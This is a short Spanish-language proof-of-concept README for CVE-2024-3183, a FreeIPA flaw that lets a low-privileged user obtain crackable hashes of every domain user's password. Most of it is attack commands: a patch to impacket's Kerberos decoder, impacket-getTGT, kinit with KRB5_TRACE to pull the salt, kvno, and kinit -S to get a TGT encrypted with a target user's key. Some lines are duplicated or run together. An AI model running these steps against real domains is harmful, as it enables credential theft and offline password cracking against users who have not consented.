
POC para CVE-2024-3183 (FreeIPA Rosting)
POC para CVE-2024-3183 (FreeIPA Rosting)
Impacto: Un usuario con pocos privilegios puede obtener un hash de las contraseñas de todos los usuarios del dominio y realizar fuerza bruta offline (kerberoasting).
Parche para impacket-getTGT:
decoder.decode.defaultErrorState = stGetValueDecoderByTag a impacket/krb5/kerberosv5.py.decoder.decode.defaultErrorState = stGetValueDecoderByTag a impacket/krb5/kerberosv5.py.-service y -debug para obtener la salt en un solo comando.
impacket-getTGT test.local/user -debug -service admin
printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt

kvno admin


1 - TGS, 2 - SALT, 3 - Contraseñas.
kinit -S target usery obtienes un TGT cifrado con la clave del usuario objetivo.